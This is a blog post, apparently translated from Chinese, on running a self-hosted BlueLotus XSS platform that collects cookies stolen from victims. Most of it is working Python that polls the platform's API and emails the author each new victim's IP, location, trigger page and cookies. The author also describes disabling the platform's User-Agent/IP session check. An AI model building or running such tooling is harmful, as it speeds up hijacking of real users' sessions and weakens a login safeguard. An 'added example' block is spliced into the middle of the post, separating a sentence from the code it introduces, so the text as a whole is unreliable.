I'm an XSS guy: during pentests I need XSS payloads all the time, and I don't dare use platforms other people have set up, so I bought a server, found some source code and built my own personal XSS platform. Because of limitations of the hosting space I couldn't configure outgoing mail, and without mail notifications I kept missing the moment a stolen cookie arrived and the chance to use it to keep the pentest going.

1. Analysing the XSS platform's functionality


The platform I use is the lightweight, database-free open-source XSS platform written by the Blue Lotus CTF team; project: BlueLotus_XSSReceiver.
In api.php two functions are called to return, as JSON, all record timestamps (id_list) and the full details of every record (list):
if ( isset( $_GET['cmd'] ) ) {
    switch ( $_GET['cmd'] ) {
        // return every record, including its details
        case 'list':
            echo json_encode( list_xss_record_detail() );
            break;

        // return only the timestamps (the index ids)
        case 'id_list':
            echo json_encode( list_xss_record_id() );
            break;

        // (other cases omitted)
    }
}

Three timestamps correspond to three detail records (screenshots of the ?api=id_list and ?api=list responses):

2. Monitoring the platform with Python


To implement monitoring, first consider what to watch out for and how to implement each feature:
1. What to do when the session the program uses expires
2. What to do if the program's frequent requests bring the site down
3. How to tell whether the platform has received a new cookie
4. How to send an alert once a cookie arrives
 
Thinking it through there are more concerns, but roughly the answers are:

1. The monitor works by sending a request every minute; as long as requests keep coming, the server-side session never expires, much like a session keep-alive attack.
2. Request once per minute; if the site goes down for some reason beyond our control, request every 100 seconds to check whether it has come back.
3. On each poll, request id_list to get the number of timestamps and check whether it is greater than the count from the previous request; if so, request list and take the newest record's details.
4. I originally wanted SMS alerts, but SMS turned out too expensive. Then I considered a QQ bot to alert on QQ, but keeping a QQ bot online would need a Windows server. In the end only email alerts were left.
 
With those questions answered, I wrote a demo:
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import requests, time

# session cookie of the logged-in platform account (cookie name -> value)
cookie = {
    'PHPSESSID': '*******************'
}
id_list = 'http://xssir.org/api.php?cmd=id_list'
List = 'http://xssir.org/api.php?cmd=list'

while True:
    id_list_r = requests.get(id_list, cookies=cookie, timeout=20)
    time.sleep(10)
    id_list__r = requests.get(id_list, cookies=cookie, timeout=20)
    # compare the number of timestamps with the previous poll; a change means a new record arrived
    if len(id_list_r.json()) != len(id_list__r.json()):
        List_r = requests.get(List, cookies=cookie, timeout=20)
        List_json = List_r.json()
        List_json = List_json[0]  # the newest record is first
        print(List_json['user_IP'])

 

It checks whether the length of id_list differs from the previous request; if it does, it requests ?cmd=list and takes user_IP from the first record of the details, i.e. the IP of the XSS victim.
 
Here I have to mention a huge, huge pitfall I hit while writing the script: during debugging, as soon as the program sent a request to the XSS platform it was logged out. At first I thought the program was broken; after a long time debugging with no luck, I read the platform source and found this check:
if ( !(isset($_SESSION['isLogin']) && $_SESSION['isLogin'] === true && isset($_SESSION['user_agent']) && $_SESSION['user_agent'] != "" && $_SESSION['user_agent'] === $_SERVER['HTTP_USER_AGENT']) ) {
    $_SESSION['isLogin']    = false;
    $_SESSION['user_IP']    = "";
    $_SESSION['user_agent'] = "";
    session_unset();
    session_destroy();
    header("Location: login.php");
    exit();
}

if ( ADMIN_IP_CHECK_ENABLE && !(isset($_SESSION['user_IP']) && $_SESSION['user_IP'] != "" && $_SESSION['user_IP'] === getRealIP()) ) {
    $_SESSION['isLogin']    = false;
    $_SESSION['user_IP']    = "";
    $_SESSION['user_agent'] = "";
    session_unset();
    session_destroy();
    header("Location: login.php");
    exit();
}

 

It checks not only the IP but also the User-Agent header, and my program used a custom User-Agent. I cursed inwardly and quietly commented the check out.
With that out of the way, only the mail notification remained. There's nothing much to it; Baidu turns up piles of articles on sending mail with Python, so I'll just describe one small pitfall I hit.
SMTP_SSL
After setting up my NetEase (163.com) mailbox I wrote a simple sending script, and it kept throwing errors I couldn't pin down. Infuriating. I later asked in a group chat and it turned out I had used the wrong function. The failing code:
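To make the check above concrete, here is an added Python model of the same session binding (example code, not part of the original post or of BlueLotus): a session stays valid only while the request's User-Agent, and with ADMIN_IP_CHECK_ENABLE its source IP, match what was stored at login, and any mismatch wipes the session, which is exactly the forced logout a script with a custom User-Agent runs into. The User-Agent string and the IP addresses in the demo are constructed.

```python
# Added example (not from the original post or the BlueLotus project): a Python
# model of the PHP session-binding check above. The session stays valid only while
# the request's User-Agent (and, with ADMIN_IP_CHECK_ENABLE, its source IP) equals
# what was recorded at login; a mismatch wipes the session, which is the
# "automatic logout" the author's custom-UA script ran into.
from dataclasses import dataclass

ADMIN_IP_CHECK_ENABLE = True  # same name as the BlueLotus config constant


@dataclass
class Session:
    """Mirror of the $_SESSION fields the PHP check reads."""
    isLogin: bool = False
    user_agent: str = ""
    user_IP: str = ""


def login(user_agent: str, ip: str) -> Session:
    """Create a session bound to the client's UA and IP (what login.php stores)."""
    return Session(isLogin=True, user_agent=user_agent, user_IP=ip)


def check_session(session: Session, request_ua: str, request_ip: str) -> bool:
    """Return True if the request may proceed; otherwise reset the session, the
    equivalent of session_unset()/session_destroy() plus the redirect to login.php."""
    ua_ok = (session.isLogin is True and session.user_agent != ""
             and session.user_agent == request_ua)
    ip_ok = (not ADMIN_IP_CHECK_ENABLE) or (
        session.user_IP != "" and session.user_IP == request_ip)
    if not (ua_ok and ip_ok):
        session.isLogin = False
        session.user_agent = ""
        session.user_IP = ""
        return False
    return True


def demo() -> dict:
    """Constructed scenario: log in from a browser, then replay the session
    from the same browser, from a script with a custom UA, and from another IP."""
    browser_ua = "Mozilla/5.0 (constructed browser UA)"
    ip = "203.0.113.10"  # constructed documentation address
    results = {}
    results["same_browser"] = check_session(login(browser_ua, ip), browser_ua, ip)
    s = login(browser_ua, ip)
    results["script_custom_ua"] = check_session(s, "Author:ShePi Team | WWW.LSAFE.ORG", ip)
    results["session_wiped"] = s.isLogin is False and s.user_agent == ""
    results["ip_changed"] = check_session(login(browser_ua, ip), browser_ua, "198.51.100.7")
    return results
```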
#!/usr/bin/env python3
#coding: utf-8
# failing version: plain smtplib.SMTP against a server that expects SSL
import smtplib
from email.mime.text import MIMEText

sender = 'm158*******@163.com'
receiver = '**********@qq.com'
subject = 'python email test'
smtpserver = 'smtp.163.com'
username = 'm158*******@163.com'
password = '******'

msg = MIMEText('<h1>TEST</h1>','html','utf-8')

msg['Subject'] = subject

smtp = smtplib.SMTP()
smtp.connect('smtp.163.com')
smtp.login(username, password)
smtp.sendmail(sender, receiver, msg.as_string())
smtp.quit()

smtp.163.com expects an SSL/TLS connection, but smtplib.SMTP opens a plaintext connection (port 25 by default), so it fails. The fix is simple: use SMTP_SSL() instead, connecting to port 465:

import smtplib
from email.mime.text import MIMEText
from email.header import Header

def send_email(receiver, subject, body):
  if not receiver:
    return False
  sender = 'Rrrrrr Cookie~ <m158319*****@163.com>'
  smtpserver = 'smtp.163.com'
  username = 'm158319*****@163.com'
  password = '******'
  msg = MIMEText(body, 'html', 'utf-8')
  msg['Subject'] = Header(subject, 'utf-8')
  msg['From'] = sender
  msg['To'] = receiver
  try:
    # implicit TLS on port 465, which is what smtp.163.com expects
    smtp = smtplib.SMTP_SSL(smtpserver, 465)
    smtp.ehlo()
    smtp.login(username, password)
    smtp.sendmail(sender, receiver, msg.as_string())
    smtp.quit()
    return True
  except Exception as e:
    print(e)
    return False

Below are a screenshot of it running and of the resulting email, followed by the complete script:

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import json, time, requests, smtplib
from requests.exceptions import RequestException
from email.mime.text import MIMEText
from email.header import Header

Me = '1476755447@qq.com'  # address that receives the alerts
header = {
  'Host': 'xssir.org',
  'Pragma': 'no-cache',
  'Cache-Control': 'no-cache',
  # must be identical to the User-Agent the session was created with (see the check above)
  'User-Agent': 'Author:ShePi Team | WWW.LSAFE.ORG',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  'Referer': 'http://xssir.org/login.php?key=******',
  'Accept-Encoding': 'gzip, deflate',
  'Accept-Language': 'zh-CN,zh;q=0.8',
  'Cookie': 'PHPSESSID=********',
  'Connection': 'close'
}
Source = 'http://xssir.org/api.php?cmd=list'
Sourcenum = 'http://xssir.org/api.php?cmd=id_list'

def send_email(receiver, subject, body):
  if not receiver:
    return False
  sender = 'Rrrrrr Cookie~ <m15831*****@163.com>'
  smtpserver = 'smtp.163.com'
  username = 'm158319*****@163.com'
  password = '*****'
  msg = MIMEText(body, 'html', 'utf-8')
  msg['Subject'] = Header(subject, 'utf-8')
  msg['From'] = sender
  msg['To'] = receiver
  try:
    smtp = smtplib.SMTP_SSL(smtpserver, 465)
    smtp.ehlo()
    smtp.login(username, password)
    smtp.sendmail(sender, receiver, msg.as_string())
    smtp.quit()
    return True
  except Exception as e:
    print(e)
    return False

def getNewlist(url, header):
  """Poll the id_list endpoint twice, 60 s apart; return the newest record's
  details if the number of timestamps changed, otherwise None."""
  try:
    # allow_redirects=False so the redirect to login.php (expired session) is visible as a non-200
    r = requests.get(url, headers=header, timeout=20, allow_redirects=False)
    if r.status_code != 200:
      send_email(Me, 'Cookie Invalid!', 'Cookie Invalid!')
      print('[*]Cookie Be overdue!')
      raise SystemExit(1)
    num = r.json()
    time.sleep(60)
    numone = requests.get(url, headers=header, timeout=20, allow_redirects=False).json()
    if len(num) != len(numone):
      return getMessage(Source, header)
    return None
  except RequestException:
    # site unreachable: wait 100 s, then the main loop polls again
    print('[*]The connection failed, retrying in 100 seconds!')
    time.sleep(100)
    return None

def getMessage(url, header):
  """Fetch the full record list and format the newest record as an HTML mail body."""
  try:
    r = requests.get(url, headers=header, timeout=20, allow_redirects=False).json()
    record = r[0]  # the newest record is first
    get_data = record['get_data']
    times = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(float(record['request_time'])))
    cookies = json.dumps(record['cookie_data'], ensure_ascii=False) if record['cookie_data'] else 'NULL'
    messageList = '''
Receive a new cookie:\n <br>
    Ip:%s <br>
    Ip address:%s <br>
    Time:%s <br>
    Trigger link:%s <br>
    Cookie: %s <br>
    ''' % (record['user_IP'], record['location'], times, get_data['toplocation'], cookies)
    return messageList
  except RequestException:
    print('[*]The connection failed, retrying in 100 seconds!')
    time.sleep(100)
    return None

while True:
  adminss = getNewlist(Sourcenum, header)
  if adminss is not None:
    print(adminss.replace('<br>', ''))
    send_email(Me, 'Receive cookie~', adminss)
    print('[*]Receive Cookie the Email~')